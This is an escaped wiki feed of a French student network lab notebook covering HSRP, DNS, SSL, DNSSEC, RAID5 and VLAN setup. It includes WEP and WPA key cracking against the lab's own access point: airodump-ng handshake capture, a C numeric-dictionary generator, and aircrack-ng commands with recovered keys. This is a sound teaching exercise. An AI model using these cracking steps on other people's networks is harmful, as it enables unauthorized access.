    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;A AJOUTER&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35442</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35442"/>
				<updated>2016-11-28T10:30:03Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Présentation du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
